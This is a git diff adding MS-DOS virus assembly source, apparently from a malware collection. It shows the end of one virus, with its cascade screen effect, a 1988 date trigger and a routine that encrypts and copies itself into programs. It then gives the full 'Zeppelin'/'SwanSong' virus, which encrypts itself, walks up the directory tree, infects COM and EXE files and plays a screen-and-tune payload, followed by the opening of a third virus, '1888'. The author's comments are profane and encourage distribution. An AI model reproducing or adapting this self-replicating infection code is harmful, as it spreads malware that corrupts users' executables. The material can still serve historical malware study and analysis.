DS:NOTHING + MOV AX,CX ; Transfer count + XOR DX,DX ; Clear register + MOV CX,000FH ; \ Divide by 15 + DIV CX ; / + MOV LOOPCT,AX ; Save timed loop count + RET + +TIM040: DEC CX ; Set to minus one + JMP SHORT TIM030 + + ; Cascade display routine + + ASSUME DS:CODE +DISPLY: MOV NUMROW,18H ; Number of display rows + PUSH DS + MOV AX,0040H ; \ Set DS to system RAM + MOV DS,AX ; / + ASSUME DS:RAM + MOV AX,BW044E ; VDU display start address + POP DS + ASSUME DS:CODE + MOV VDURAM,AX ; Save VDU display start address + MOV DL,0FFH + MOV AX,1130H ; Get character generator information + MOV BH,0 ; Int 1FH vector + PUSH ES + PUSH BP + INT 10H ; VDU I/O + POP BP + POP ES + CMP DL,0FFH ; Is register unchanged? + JE DSP010 ; Branch if yes + MOV NUMROW,DL ; Number of display rows (EGA) +DSP010: MOV AH,0FH ; Get VDU parameters + INT 10H ; VDU I/O + MOV NUMCOL,AH ; Save number of columns + MOV C80_SW,0 ; Set off 80 column text switch + MOV RAM_SG,0B000H ; Video RAM segment - Mono + CMP AL,7 ; Mode 7? + JE DSP040 ; Branch if yes + JB DSP020 ; Branch if less + JMP DSP130 ; Switch off speaker and return + +DSP020: MOV RAM_SG,0B800H ; Video RAM segment + CMP AL,3 ; Display mode 3? + JA DSP040 ; Branch if above + CMP AL,2 ; Display mode 2? + JB DSP040 ; Branch if below + MOV C80_SW,1 ; Set on 80 column text switch + MOV AL,NUMROW ; Number of display rows + INC AL ; Number, not offset + MUL NUMCOL ; Number of visible columns + MOV NUMPOS,AX ; Save number of display positions + MOV AX,RANPOS ; Get number of lines to affect + CMP AX,NUMPOS ; Number of display positions + JBE DSP030 ; Branch if within range + MOV AX,NUMPOS ; Get number of display positions +DSP030: CALL RNDNUM ; Create random number + INC AX ; Add to random number + MOV SI,AX ; Use as count +DSP040: XOR DI,DI ; Set second count to zero +DSP050: INC DI ; Increment second count + MOV AX,NUMPOS ; Get number of display positions + SHL AX,1 ; Multiply by two + CMP DI,AX ; Has second count reached this? + JBE DSP060 ; Branch if not + JMP DSP130 ; Switch off speaker and return + +DSP060: OR SWITCH,2 ; Set on switch 2 + MOV AL,NUMCOL ; \ Number of visible columns + MOV AH,0 ; / is upper limit + CALL RNDNUM ; Create random number + MOV DL,AL ; Random column number + MOV AL,NUMROW ; \ Number of display rows + MOV AH,0 ; / is upper limit + CALL RNDNUM ; Create random number + MOV DH,AL ; Random row number + CALL GETCHA ; Get character and attributes + CALL IGNORE ; Is character 0, 32 or 255? + JB DSP050 ; Branch if yes + CALL GRAPHD ; Is it a graphic display character + JB DSP050 ; Branch if yes + MOV CURCHA,AL ; Save current character + MOV CURATT,AH ; Save current attributes + MOV CL,NUMROW ; Number of display rows + MOV CH,0 ; Column zero +DSP070: INC DH ; Next row + CMP DH,NUMROW ; Was that the last row? + JA DSP110 ; Branch if yes + CALL GETCHA ; Get character and attributes + CMP AH,CURATT ; Are attributes the same? + JNE DSP110 ; Branch if not + CALL IGNORE ; Is character 0, 32 or 255? + JB DSP090 ; Branch if yes +DSP080: CALL GRAPHD ; Is it a graphic display character + JB DSP110 ; Branch if yes + INC DH ; Next row + CMP DH,NUMROW ; Was that the last row? + JA DSP110 ; Branch if yes + CALL GETCHA ; Get character and attributes + CMP AH,CURATT ; Are attributes the same? + JNE DSP110 ; Branch if not + CALL IGNORE ; Is character 0, 32 or 255? + JNB DSP080 ; Branch if not + CALL CH_SND ; Toggle speaker drive + DEC DH ; Previous row + CALL GETCHA ; Get character and attributes + MOV CURCHA,AL ; Save current character + INC DH ; Next row +DSP090: AND SWITCH,0FDH ; Set off switch 2 + DEC DH ; Previous row + MOV AL,20H ; Replace character with space + CALL STOCHA ; Store character and attributes + INC DH ; Next row + MOV AL,CURCHA ; Get current character + CALL STOCHA ; Store character and attributes + JCXZ DSP100 ; Branch if end of count + CALL DELAY ; Delay loop + DEC CX ; Decrement count +DSP100: JMP SHORT DSP070 + +DSP110: TEST SWITCH,2 ; Test switch 2 + JZ DSP120 ; Branch if off + JMP DSP050 + +DSP120: CALL CH_SND ; Toggle speaker drive + DEC SI ; Subtract from count + JZ DSP130 ; Switch off speaker and return + JMP DSP040 + + ; Switch off speaker and return + +DSP130: IN AL,61H ; Get port B + AND AL,0FCH ; Switch off speaker + OUT 61H,AL ; Rewrite port B+ + RET + + ; Interrupt 1CH routine + + ASSUME DS:NOTHING +INT_1C: TEST SWITCH,9 ; No display or already active? + JNZ I_1C40 ; Branch if either are on + OR SWITCH,1 ; Set on Int 1CH active switch + DEC I1CCNT ; Subtract from Int 1CH count + JNZ I_1C30 ; Branch if not zero + PUSH DS + PUSH ES + PUSH CS ; \ Set DS to CS + POP DS ; / + PUSH CS ; \ Set ES to CS + POP ES ; / + ASSUME DS:CODE + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DI + PUSH BP + MOV AL,20H ; \ Signal end of interrupt + OUT 20H,AL ; / + MOV AX,I1CMAX ; Get Int 1CH random no maximum + CMP AX,0438H ; Is it 1080 or above + JNB I_1C10 ; Branch if yes + MOV AX,0438H ; Upper limit - 1080 +I_1C10: CALL RNDNUM ; Create random number + INC AX ; Add to random number + MOV I1CCNT,AX ; Reset Int 1CH count + MOV I1CMAX,AX ; Reset Int 1CH random no maximum + CALL DISPLY ; Cascade display routine + MOV AX,3 ; Upper limit - 3 + CALL RNDNUM ; Create random number + INC AX ; Add to random number + MUL RANPOS ; Multiply by num of lines to affect + JNB I_1C20 ; Is result more than a word? + MOV AX,-1 ; Set to maximum +I_1C20: MOV RANPOS,AX ; Save number of lines to affect + POP BP + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + POP ES + POP DS + ASSUME DS:NOTHING +I_1C30: AND SWITCH,0FEH ; Set off Int 1CH active switch +I_1C40: JMP I1CBIO ; Branch to original int 1CH + + ; Interrupt 28H routine + +INT_28: TEST SWITCH,8 ; Test No display switch + JZ I_2830 ; Branch if not + PUSH AX + PUSH CX + PUSH DX + MOV AH,2AH ; Get date function + INT 21H ; DOS service + CMP CX,07C4H ; Year 1988? + JB I_2820 ; Not yet - do nothing + JA I_2810 ; After 1988 + CMP DH,0AH ; October? + JB I_2820 ; Not yet - do nothing +I_2810: AND SWITCH,0F7H ; Set off No display switch +I_2820: POP DX + POP CX + POP AX +I_2830: JMP I28BIO ; Branch to original int 28H + + ; Copy virus to program + +CPYVIR: PUSH ES + PUSH BX + MOV AH,48H ; Allocate memory function + MOV BX,006BH ; Length of virus + INT 21H ; DOS service + POP BX + JNB CPY020 ; Branch if no error +CPY010: STC + POP ES + RET + +CPY020: MOV DB0100,1 ; Set encryption indicator + MOV ES,AX ; Set target segment to allocated + PUSH CS ; \ Set DS to CS + POP DS ; / + ASSUME DS:CODE + XOR DI,DI ; Start of allocated + MOV SI,OFFSET DB0100 ; Start of virus + MOV CX,VIRLEN ; Length of virus + CLD + REPZ MOVSB ; Copy virus + MOV DI,0023H ; Start of area to encrypt + MOV SI,OFFSET BP0030 ; Address of area + ADD SI,F_SIZ1 ; Length of target file + MOV CX,OFFSET ENDADR-BP0030 ; Length to encrypt +CPY030: XOR ES:[DI],SI ; \ Encrypt + XOR ES:[DI],CX ; / + INC DI ; \ Next address + INC SI ; / + LOOP CPY030 ; Repeat for all area + MOV DS,AX ; Allocated area segment + MOV AH,40H ; Write handle function + XOR DX,DX ; From start + MOV CX,VIRLEN ; Length of virus + INT 21H ; DOS service + PUSHF + PUSH AX + MOV AH,49H ; Free allocated memory function + INT 21H ; DOS service + POP AX + POPF + PUSH CS ; \ Set DS to CS + POP DS ; / + JB CPY010 ; Branch if error + CMP AX,CX ; Correct length written? + JNE CPY010 ; Branch if error + POP ES + CLC +CPY040: RET + +ENDADR EQU $ + +CODE ENDS + + END START + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.1717.asm b/MSDOS/Virus.MSDOS.Unknown.1717.asm new file mode 100644 index 00000000..8b8b1df4 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.1717.asm @@ -0,0 +1,664 @@ +;************************************************************************** +; +;The Zeppelin Virus September 25, 1992 +;[MPC] Generated... +;Created by... pAgE +;As a TRiBuTe to John "back-beat" Bohnam, this "WEAK-DICK" ViRUS was made! +;Incidently. He died on this date in 1980! Got drunk and strangled on a +;CunT hAiR...oR wAs iT a tAmPoN???...Oh well, So goes RocK -n- RoLL... +;By the wAy<---That's whAt you sAy just beforE you bOrE the FuCK out of +;soMeoNe with anOthEr TRiViAl piEce of SHiT!!! These LiTTLe Up AnD LeTTeRS +;ThAt yA'll uSe, ArE a KicK.... +; +;Okay, enough anti-social, suicidal, satan, sputum...On with the ViRUS... +; GeT'S in ThE bl00d DoEsn't it?------->^^^^^ +; +;Here it is... +;It's not much, but in the hands off a knowledgeable Vx WRiTeR....... +;I'll keep workin' on it and see what I can do. In the mean time, have fun! +;I ReM'd out a lot of the ShIt iN here, So Joe LuNChmEaT doesn;t FrY hImSelF. +; +;But...If that's not good enough, well then - hEy! - BLoW mE! +; +;*************************************************************************** + +.model tiny ; Handy directive +.code ; Virus code segment + org 100h ; COM file starting IP + +id = 'IS' ; ID word for EXE infections +entry_point: db 0e9h,0,0 ; jmp decrypt + +decrypt: ; handles encryption and decryption +patch_startencrypt: + mov di,offset startencrypt ; start of decryption + mov si,(offset heap - offset startencrypt)/2 ; iterations +decrypt_loop: + db 2eh,81h,35h ; xor word ptr cs:[di], xxxx +decrypt_value dw 0 ; initialised at zero for null effect + inc di ; calculate new decryption location + inc di + dec si ; If we are not done, then + jnz decrypt_loop ; decrypt mo' +startencrypt: + call next ; calculate delta offset +next: + pop bp ; bp = IP next + sub bp,offset next ; bp = delta offset + + + cmp sp,id ; COM or EXE? + je restoreEXE +restoreCOM: + lea si,[bp+save3] + mov di,100h + push di ; For later return + movsb + jmp short restoreEXIT +restoreEXE: + push ds + push es + push cs ; DS = CS + pop ds + push cs ; ES = CS + pop es + lea si,[bp+jmpsave2] + lea di,[bp+jmpsave] + movsw + movsw + movsw +restoreEXIT: + movsw + + mov byte ptr [bp+numinfec],5 ; reset infection counter + + mov ah,1Ah ; Set new DTA + lea dx,[bp+newDTA] ; new DTA @ DS:DX + int 21h + + mov ah,47h ; Get current directory + mov dl,0 ; Current drive + lea si,[bp+origdir] ; DS:SI->buffer + int 21h + mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR + + mov ax,3524h ; Get int 24 handler + int 21h ; to ES:BX + mov word ptr [bp+oldint24],bx; Save it + mov word ptr [bp+oldint24+2],es + mov ah,25h ; Set new int 24 handler + lea dx,[bp+offset int24] ; DS:DX->new handler + int 21h + push cs ; Restore ES + pop es ; 'cuz it was changed + +dir_scan: ; "dot dot" traversal + lea dx,[bp+exe_mask] + call infect_mask + lea dx,[bp+com_mask] + call infect_mask + mov ah,3bh ; change directory + lea dx,[bp+dot_dot] ; "cd .." + int 21h + jnc dir_scan ; go back for mo! + +done_infections: + ;mov ah,2ah ; Get current date + ;int 21h + ;cmp dh,9 ; Check month + ;jb act_two + ;cmp dl,25 ; Check date + ;jb act_two + ;cmp cx,1992 ; Check year + ;jb act_two + ;cmp al,0 ; Check date of week + ;jb activate + + ;mov ah,2ch ; Get current time + ;int 21h + ;cmp dl,50 ; Check the percentage + jbe activate + +exit_virus: + mov ax,2524h ; Restore int 24 handler + lds dx,[bp+offset oldint24] ; to original + int 21h + push cs + pop ds + + mov ah,3bh ; change directory + lea dx,[bp+origdir-1] ; original directory + int 21h + + mov ah,1ah ; restore DTA to default + mov dx,80h ; DTA in PSP + cmp sp,id-4 ; EXE or COM? + jz returnEXE +returnCOM: + int 27h + retn ; 100h is on stack +returnEXE: + pop es + pop ds + int 21h + mov ax,es ; AX = PSP segment + add ax,10h ; Adjust for PSP + add word ptr cs:[bp+jmpsave+2],ax + add ax,word ptr cs:[bp+stacksave+2] + cli ; Clear intrpts for stack manipulation + mov sp,word ptr cs:[bp+stacksave] + mov ss,ax + sti + db 0eah ; jmp ssss:oooo +jmpsave dd ? ; Original CS:IP +stacksave dd ? ; Original SS:SP +jmpsave2 db ? ; Actually four bytes +save3 db 0cdh,20h,0 ; First 3 bytes of COM file +exe_mask db '*.exe',0 +com_mask db '*.com',0 +stacksave2 dd ? + +activate proc far + +start: + jmp short loc_1 + db 90h +data_2 db 0 +data_3 dw 216h + db 2 +data_4 dw 0 + db 'Ripped this Motherfucker off' + db 1Ah +data_5 db 'SHIT!!! Wont work....', 0Dh, 0Ah + db '$' +loc_1: + + mov ax,0003h ; stick 3 into ax. + int 10h ; Set up 80*25, text mode. Clear the screen, too. + mov ah,0Fh + int 10h ; Video display ah=functn 0Fh + ; get state, al=mode, bh=page + ; ah=columns on screen + mov bx,0B800h + cmp al,2 + je loc_2 ; Jump if equal + cmp al,3 + je loc_2 ; Jump if equal + mov data_2,0 + mov bx,0B000h + cmp al,7 + je loc_2 ; Jump if equal + mov dx,offset data_5 ; ('Unsupported Video Mode') + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + retn +loc_2: + mov es,bx + mov di,data_4 + mov si,offset data_6 + mov dx,3DAh + mov bl,9 + mov cx,data_3 + cld ; Clear direction + xor ax,ax ; Zero register + +locloop_4: + lodsb ; String [si] to al + cmp al,1Bh + jne loc_5 ; Jump if not equal + xor ah,80h + jmp short loc_20 +loc_5: + cmp al,10h + jae loc_8 ; Jump if above or = + and ah,0F0h + or ah,al + jmp short loc_20 +loc_8: + cmp al,18h + je loc_11 ; Jump if equal + jnc loc_12 ; Jump if carry=0 + sub al,10h + add al,al + add al,al + add al,al + add al,al + and ah,8Fh + or ah,al + jmp short loc_20 +loc_11: + mov di,data_4 + add di,data_1e + mov data_4,di + jmp short loc_20 +loc_12: + mov bp,cx + mov cx,1 + cmp al,19h + jne loc_13 ; Jump if not equal + lodsb ; String [si] to al + mov cl,al + mov al,20h ; ' ' + dec bp + jmp short loc_14 +loc_13: + cmp al,1Ah + jne loc_15 ; Jump if not equal + lodsb ; String [si] to al + dec bp + mov cl,al + lodsb ; String [si] to al + dec bp +loc_14: + inc cx +loc_15: + cmp data_2,0 + je loc_18 ; Jump if equal + mov bh,al + +locloop_16: + in al,dx ; port 3DAh, CGA/EGA vid status + rcr al,1 ; Rotate thru carry + jc locloop_16 ; Jump if carry Set +loc_17: + in al,dx ; port 3DAh, CGA/EGA vid status + and al,bl + jnz loc_17 ; Jump if not zero + mov al,bh + stosw ; Store ax to es:[di] + loop locloop_16 ; Loop if cx > 0 + + jmp short loc_19 +loc_18: + rep stosw ; Rep when cx >0 Store ax to es:[di] +loc_19: + mov cx,bp +loc_20: + jcxz loc_new_25 ; Jump if cx=0 + loop locloop_4 ; Loop if cx > 0 +loc_new_25: + + + mov si,offset data00 ; SI points to data +get_note: mov bx,[si] ; Load BX with the frequency + or bx,bx ; Is BX equal to zero? + je play_tune_done ; If it is we are finished + + mov ax,034DDh ; + mov dx,0012h ; + cmp dx,bx ; + jnb new_note ; + div bx ; This bit here was stolen + mov bx,ax ; from the Turbo C++ v1.0 + in al,061h ; library file CS.LIB. I + test al,3 ; extracted sound() from the + jne skip_an_or ; library and linked it to + or al,3 ; an .EXE file, then diassembled + out 061h,al ; it. Basically this turns + mov al,0B6h ; on the speaker at a certain + out 043h,al ; frequency. +skip_an_or: mov al,bl ; + out 042h,al ; + mov al,bh ; + out 042h,al ; + + mov bx,[si + 2] ; BX holds duration value + xor ah,ah ; BIOS get time function + int 1Ah + add bx,dx ; Add the time to the length +wait_loop: int 1Ah ; Get the time again (AH = 0) + cmp dx,bx ; Is the delay over? + jne wait_loop ; Repeat until it is + in al,061h ; Stolen from the nosound() + and al,0FCh ; procedure in Turbo C++ v1.0. + out 061h,al ; This turns off the speaker. + +new_note: add si,4 ; SI points to next note + jmp short get_note ; Repeat with the next note +play_tune_done: +activate endp + + jmp exit_virus + +creator db '[pAgE]',0 ; YOU REALLY SHOULD TAKE THIS +virusname db '[SwanSong]',0 ; BULLSHIT OUT OF HERE!!! +author db 'pAgE',0 ; WHY NOT HOLD UP A SIGN!!! + +infect_mask: + mov ah,4eh ; find first file + mov cx,7 ; any attribute +findfirstnext: + int 21h ; DS:DX points to mask + jc exit_infect_mask ; No mo files found + + mov al,0h ; Open read only + call open + + mov ah,3fh ; Read file to buffer + lea dx,[bp+buffer] ; @ DS:DX + mov cx,20h ; 1Ah bytes + int 21h + + mov ah,3eh ; Close file + int 21h + + cmp word ptr [bp+buffer],'ZM'; EXE? + jz checkEXE ; Why yes, yes it is! +checkCOM: + mov ax,word ptr [bp+newDTA+1ah] ; Filesize in DTA + cmp ax,(heap-decrypt) ; Is it too small? + jb find_next + + mov bx,word ptr [bp+buffer+1] ;get jmp location + add bx,(heap-decrypt+1) ; Adjust for virus size + cmp ax,bx + je find_next ; already infected + jmp infect_com +checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected? + jnz infect_exe +find_next: + mov ah,4fh ; find next file + jmp short findfirstnext +exit_infect_mask: ret + +infect_exe: + les ax, dword ptr [bp+buffer+14h] ; Save old entry point + mov word ptr [bp+jmpsave2], ax + mov word ptr [bp+jmpsave2+2], es + + les ax, dword ptr [bp+buffer+0Eh] ; Save old stack + mov word ptr [bp+stacksave2], es + mov word ptr [bp+stacksave2+2], ax + + mov ax, word ptr [bp+buffer + 8] ; Get header size + mov cl, 4 ; convert to bytes + shl ax, cl + xchg ax, bx + + les ax, [bp+offset newDTA+26]; Get file size + mov dx, es ; to DX:AX + push ax + push dx + + sub ax, bx ; Subtract header size from + sbb dx, 0 ; file size + + mov cx, 10h ; Convert to segment:offset + div cx ; form + + mov word ptr [bp+buffer+14h], dx ; New entry point + mov word ptr [bp+buffer+16h], ax + + mov word ptr [bp+buffer+0Eh], ax ; and stack + mov word ptr [bp+buffer+10h], id + + pop dx ; get file length + pop ax + + add ax,(heap-decrypt) ; add virus size + adc dx, 0 + + mov cl, 9 + push ax + shr ax, cl + ror dx, cl + stc + adc dx, ax + pop ax + and ah, 1 ; mod 512 + + mov word ptr [bp+buffer+4], dx ; new file size + mov word ptr [bp+buffer+2], ax + + push cs ; restore ES + pop es + + push word ptr [bp+buffer+14h] ; needed later + mov cx, 1ah + jmp short finishinfection +infect_com: ; ax = filesize + mov cx,3 + sub ax,cx + lea si,[bp+offset buffer] + lea di,[bp+offset save3] + movsw + movsb + mov byte ptr [si-3],0e9h + mov word ptr [si-2],ax + add ax,103h + push ax ; needed later +finishinfection: + push cx ; Save # bytes to write + xor cx,cx ; Clear attributes + call attributes ; Set file attributes + + mov al,2 + call open + + mov ah,40h ; Write to file + lea dx,[bp+buffer] ; Write from buffer + pop cx ; cx bytes + int 21h + + mov ax,4202h ; Move file pointer + xor cx,cx ; to end of file + cwd ; xor dx,dx + int 21h + +get_encrypt_value: + mov ah,2ch ; Get current time + int 21h ; dh=sec,dl=1/100 sec + or dx,dx ; Check if encryption value = 0 + jz get_encrypt_value ; Get another if it is + mov [bp+decrypt_value],dx ; Set new encryption value + lea di,[bp+code_store] + mov ax,5355h ; push bp,push bx + stosw + lea si,[bp+decrypt] ; Copy encryption function + mov cx,startencrypt-decrypt ; Bytes to move + push si ; Save for later use + push cx + rep movsb + + lea si,[bp+write] ; Copy writing function + mov cx,endwrite-write ; Bytes to move + rep movsb + pop cx + pop si + pop dx ; Entry point of virus + push di + push si + push cx + rep movsb ; Copy decryption function + mov ax,5b5dh ; pop bx,pop bp + stosw + mov al,0c3h ; retn + stosb + + add dx,offset startencrypt - offset decrypt ; Calculate new + mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of + call code_store ; decryption + pop cx + pop di + pop si + rep movsb ; Restore decryption function + + mov ax,5701h ; Restore creation date/time + mov cx,word ptr [bp+newDTA+16h] ; time + mov dx,word ptr [bp+newDTA+18h] ; date + int 21h + + mov ah,3eh ; Close file + int 21h + + mov ch,0 + mov cl,byte ptr [bp+newDTA+15h] ; Restore original + call attributes ; attributes + + dec byte ptr [bp+numinfec] ; One mo infection + jnz mo_infections ; Not enough + pop ax ; remove call from stack + jmp done_infections +mo_infections: jmp find_next + +open: + mov ah,3dh + lea dx,[bp+newDTA+30] ; filename in DTA + int 21h + xchg ax,bx + ret + +attributes: + mov ax,4301h ; Set attributes to cx + lea dx,[bp+newDTA+30] ; filename in DTA + int 21h + ret + +write: + pop bx ; Restore file handle + pop bp ; Restore relativeness + mov ah,40h ; Write to file + lea dx,[bp+decrypt] ; Concatenate virus + mov cx,(heap-decrypt) ; # bytes to write + int 21h + push bx + push bp +endwrite: + +int24: ; New int 24h (error) handler + mov al,3 ; Fail call + iret ; Return control +data00 dw 2000,8,2500,8,2000,14,2500,14 + dw 2500,14,3000,4,4000,24,3500,12,4000,6 + dw 3500,12,4000,4,4500,10,5000,4 + dw 5500,15,3000,8,3500,20,3000,8,3500,50 + dw 2000,8,2500,8,2000,14,2500,14 + dw 2500,14,3000,4,4000,24,3500,12,4000,6 + dw 3500,12,4000,4,4500,10,5000,4 + dw 5500,15,3000,8,3500,20,3000,8,3500,50 + dw 2000,8,2500,8,2000,14,2500,14 + dw 2500,14,3000,4,4000,24,3500,12,4000,6 + dw 3500,12,4000,4,4500,10,5000,4 + dw 5500,15,3000,8,3500,20,3000,8,3500,50 + dw 0 + +data_6 db 9 + db 10h, 19h, 45h, 18h, 19h, 1Bh + db 01h,0D5h,0CDh,0CDh,0B8h, 04h + db 0F3h, 09h,0A9h, 04h, 9Dh + db 9 + db 0AAh, 04h,0F2h, 01h,0D5h,0CDh + db 0CDh,0B8h, 19h, 1Ch, 18h, 19h + db 12h,0D5h, 1Ah, 0Ah,0CDh,0BEh + db 20h, 09h, 5Ch, 04h,0F6h, 09h + db 2Fh, 20h, 01h,0D4h, 1Ah, 0Ah + db 0CDh,0B8h, 19h, 13h, 18h, 19h + db 03h,0C9h, 1Ah, 0Dh,0CDh,0BEh + db 19h, 03h, 0Fh,0D2h,0B7h, 19h + db 04h,0D6h, 1Ah, 03h,0C4h,0B7h + db 20h,0D2h,0D2h,0C4h,0C4h,0C4h + db 0B7h, 19h, 04h, 01h,0D4h, 1Ah + db 0Eh,0CDh,0BBh, 19h, 03h, 18h + db 19h, 03h,0BAh, 19h, 12h, 07h + db 0BAh,0BAh, 19h, 04h,0BAh, 19h + db 03h,0BDh, 20h,0BAh,0BAh, 19h + db 02h,0D3h,0B7h, 19h, 13h, 01h + db 0BAh, 19h, 03h, 18h, 19h, 03h + db 0BAh, 19h, 07h, 0Bh, 1Ah, 02h + db 04h, 19h, 07h, 08h,0BAh,0B6h + db 19h, 04h,0C7h,0C4h,0B6h, 19h + db 03h,0BAh,0B6h, 19h, 03h,0BAh + db 19h, 07h, 0Bh, 1Ah, 02h, 04h + db 19h, 08h, 01h,0BAh, 19h, 03h + db 18h,0D6h,0C4h,0C4h, 20h,0BAh + db 19h, 12h, 08h,0BAh,0D3h, 19h + db 02h,0B7h, 20h,0BAh, 19h, 03h + db 0B7h, 20h,0BAh,0D3h, 19h, 02h + db 0D6h,0BDh, 19h, 13h, 01h,0BAh + db 20h,0C4h,0C4h,0B7h, 18h,0D3h + db 0C4h,0C4h,0C4h,0BDh, 19h, 12h + db 08h,0D3h, 1Ah, 03h,0C4h,0BDh + db 20h,0D3h, 1Ah, 03h,0C4h,0BDh + db 20h,0D0h, 1Ah, 03h,0C4h,0BDh + db 19h, 14h, 01h,0D3h,0C4h,0C4h + db 0C4h,0BDh, 18h, 04h, 1Ah, 04h + db 3Eh, 19h, 03h, 0Fh,0D6h, 1Ah + db 04h,0C4h,0B7h, 20h,0D6h, 1Ah + db 03h,0C4h,0B7h, 20h,0D2h,0D2h + db 0C4h,0C4h,0C4h,0B7h, 20h,0D2h + db 0D2h,0C4h,0C4h,0C4h,0B7h, 20h + db 0D6h, 1Ah, 03h,0C4h,0B7h, 20h + db 0D2h,0B7h, 19h, 04h,0D2h, 20h + db 20h,0D2h,0D2h,0C4h,0C4h,0C4h + db 0B7h, 19h, 03h, 04h, 1Ah, 04h + db 3Ch, 18h, 01h,0D6h,0C4h,0C4h + db 0C4h,0B7h, 19h, 07h, 07h,0D6h + db 0C4h,0BDh + dd 319BA20h ; Data table (indexed access) + db 0BDh, 20h,0BAh,0BDh, 19h, 02h + db 0BAh, 20h,0BAh,0BDh, 19h, 02h + db 0BAh, 20h,0BAh, 19h, 03h,0BDh + db 20h,0BAh,0BAh, 19h, 04h,0BAh + db 20h, 20h,0BAh,0BAh, 19h, 02h + db 0BAh, 19h, 03h, 01h,0D6h,0C4h + db 0C4h,0C4h,0B7h, 18h,0D3h,0C4h + db 0C4h, 20h,0BAh, 19h, 06h, 08h + db 58h, 19h, 03h,0C7h,0C4h,0B6h + db 19h, 03h,0BAh, 1Ah, 03h,0C4h + db 0BDh, 20h,0BAh, 1Ah, 03h,0C4h + db 0BDh, 20h,0C7h,0C4h,0B6h, 19h + db 03h,0BAh,0B6h, 19h, 04h,0BAh + db 20h, 20h,0BAh,0B6h, 19h, 02h + db 0BAh, 19h, 03h, 01h,0BAh, 20h + db 0C4h,0C4h,0BDh, 18h, 19h, 03h + db 0BAh, 19h, 03h, 08h,0D6h,0C4h + db 0BDh, 19h, 04h,0BAh, 19h, 03h + db 0B7h, 20h,0BAh, 19h, 05h,0BAh + db 19h, 05h,0BAh, 19h, 03h,0B7h + db 20h,0BAh,0D3h, 19h, 02h,0B7h + db 20h,0BAh, 20h, 20h,0BAh,0D3h + db 19h, 02h,0BAh, 19h, 03h, 01h + db 0BAh, 19h, 03h, 18h, 19h, 03h + db 0BAh, 19h, 03h, 08h,0D3h, 1Ah + db 04h,0C4h,0BDh, 20h,0D3h, 1Ah + db 03h,0C4h,0BDh, 20h,0BDh, 19h + db 05h,0BDh, 19h, 05h,0D3h, 1Ah + db 03h,0C4h,0BDh, 20h,0D3h, 1Ah + db 03h,0C4h,0BDh, 20h,0D0h, 20h + db 20h,0D0h, 19h, 03h,0D0h, 19h + db 03h, 01h,0BAh, 19h, 03h, 18h + db 19h, 03h,0C8h, 1Ah, 15h,0CDh + db 0B8h, 19h, 0Ch,0D5h, 1Ah, 16h + db 0CDh,0BCh, 19h, 03h, 18h, 19h + db 1Ah,0D4h,0CDh, 04h, 1Ah, 03h + db 0F7h, 09h, 2Fh, 04h,0EAh, 09h + db 5Ch, 04h, 1Ah, 03h,0F7h, 01h + db 0CDh,0BEh, 19h, 1Bh, 18h + +data_1e equ 0A0h +dot_dot db '..',0 +heap: +; The following code is the buffer for the write function +code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?) +oldint24 dd ? ; Storage for old int 24h handler +backslash db ? +origdir db 64 dup (?) ; Current directory buffer +newDTA db 43 dup (?) ; Temporary DTA +numinfec db ? ; Infections this run +buffer db 1ah dup (?) ; read buffer +endheap: ; End of virus +finish label near +end entry_point + + + +; Yeah, the main problem is reproducing the effect in an infected file so +; thta when IT runs, IT too will display... That's the GLITCH... +; +; Also, I had stuck INT 27H in somewhere around the EXIT .EXE... +; I don't remember, but it would go resident and suck up memory, yet +; since it hooked no interuppts, it just sat there... +; Feel free to STUDY this code and distribute it feely for educational +; purposes, because in spite of the kidding...I don't "hAcK"... for lack +; of a better word...--->>pAgE<<--- diff --git a/MSDOS/Virus.MSDOS.Unknown.1888.asm b/MSDOS/Virus.MSDOS.Unknown.1888.asm new file mode 100644 index 00000000..ccc01a31 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.1888.asm @@ -0,0 +1,1923 @@ + +PAGE 59,132 + +; +; +; 1888 +; +; Created: 28-Jul-92 +; Passes: 5 Analysis Options on: none +; +; + +d_0040_001C_e equ 1Ch +d_0040_004A_e equ 4Ah +d_8B38_0003_e equ 3 ;* +data_0012_e equ 12h +data_0016_e equ 16h +data_00A3_e equ 0A3h +data_00A7_e equ 0A7h +data_00A9_e equ 0A9h +data_00AB_e equ 0ABh +data_00AF_e equ 0AFh +data_00B3_e equ 0B3h +data_00B5_e equ 0B5h +d_9E01_0000_e equ 0 ;* +d_9E01_0002_e equ 2 ;* +d_9E01_0004_e equ 4 ;* +d_9E01_0008_e equ 8 ;* +d_9E01_0014_e equ 14h ;* +d_9E01_0016_e equ 16h ;* + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +1888 proc far + +start: + jmp loc_0767 +data_0103 db 20h +data_0104 dw 86C0h +data_0106 dw 18FCh +data_0108 dw 762h +data_010A dw 0 +data_010C db '1888.COM', 0 + db 00h, 00h, 00h,0A6h +data_0119 dw 25h +data_011B db 1 +data_011C dw 760h +data_011E db 0 +data_011F db 0 +data_0120 dw 762h +data_0122 dw 760h +data_0124 dw 0FFFEh +data_0126 dw 5369h ; Data table (indexed access) +data_0128 dw 5369h +data_012A dw 4C97h +data_012C dd 9E010000h +data_0130 dw 7C8h +data_0132 db 8 +data_0133 db 10h +data_0134 db 0 +data_0135 db 10h + db 0, 0, 0, 0 +data_013A db '\DANGER\1888' + db 20 dup (0) +data_015A db 'C:\', 0 + db '*', 0 + db 'NETWARE', 0 + db 'LMS', 0 + db 'MAUS', 0 + db 'MDB', 0 + db 'DOS', 0 + db 'BASE', 0 + db 'L', 0 +data_0180 dw 160h +data_0182 db 0 +data_0183 db 1 + db 14h, 17h, 6Eh, 00h, 01h,0A9h + db 00h, 01h,0BFh + db 38h +data_018E db 2Ah + db 2Eh, 65h, 78h, 65h, 00h +data_0194 db 2Ah + db 2Eh, 63h, 6Fh, 6Dh, 00h +data_019A db 0 +data_019B db 0 +data_019C db 0 +data_019D db 4 + db 3Fh + db 7 dup (3Fh) + db 43h, 4Fh, 4Dh, 23h, 04h, 00h + db 0F3h, 31h, 0Dh, 4Dh, 18h, 68h + db 